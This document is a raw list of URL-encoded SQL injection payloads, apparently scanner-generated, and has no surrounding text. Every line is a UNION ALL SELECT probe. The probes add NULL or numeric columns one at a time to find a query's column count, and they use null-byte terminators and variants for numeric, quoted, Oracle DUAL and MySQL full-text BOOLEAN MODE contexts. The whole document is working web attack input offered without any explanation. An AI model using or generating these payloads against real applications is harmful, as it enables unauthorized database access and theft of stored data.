1%20%2B%20%28SELECT%208964%20WHERE%203629%3D3629%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205730%20WHERE%205798%3D5798%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206870%20WHERE%202652%3D2652%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208208%20WHERE%205871%3D5871%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208472%20WHERE%206404%3D6404%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206190%20WHERE%202943%3D2943%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208652%20WHERE%201882%3D1882%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207263%20WHERE%208205%3D8205%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208568%20WHERE%209022%3D9022%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%27%20%2B%20%28SELECT%20%27yYIj%27%20FROM%20DUAL%20WHERE%204863%3D4863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27rziJ%27%20FROM%20DUAL%20WHERE%207283%3D7283%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ImEC%27%20FROM%20DUAL%20WHERE%207885%3D7885%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Xnyq%27%20FROM%20DUAL%20WHERE%202696%3D2696%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27lMTb%27%20FROM%20DUAL%20WHERE%205760%3D5760%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Bqww%27%20FROM%20DUAL%20WHERE%204017%3D4017%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mLga%27%20FROM%20DUAL%20WHERE%205421%3D5421%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27kLEA%27%20FROM%20DUAL%20WHERE%202662%3D2662%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MhmL%27%20FROM%20DUAL%20WHERE%203075%3D3075%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27OwDZ%27%20FROM%20DUAL%20WHERE%201233%3D1233%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27uMaq%27%20WHERE%206663%3D6663%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27BDBB%27%20WHERE%205557%3D5557%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27vFit%27%20WHERE%206234%3D6234%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27xvUp%27%20WHERE%204386%3D4386%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27QDLR%27%20WHERE%209084%3D9084%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27pXGD%27%20WHERE%207550%3D7550%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Zjxq%27%20WHERE%206945%3D6945%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27BEZB%27%20WHERE%207263%3D7263%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27GmBQ%27%20WHERE%205459%3D5459%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27cEDj%27%20WHERE%209364%3D9364%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -2148%29%20UNION%20ALL%20SELECT%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%2C%209159%00 -9350%29%20UNION%20ALL%20SELECT%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%2C%208022%00 -5003%29%20UNION%20ALL%20SELECT%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%2C%208800%00 -7327%29%20UNION%20ALL%20SELECT%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%2C%205818%00 -3512%29%20UNION%20ALL%20SELECT%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%00 -3557%29%20UNION%20ALL%20SELECT%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%2C%205362%00 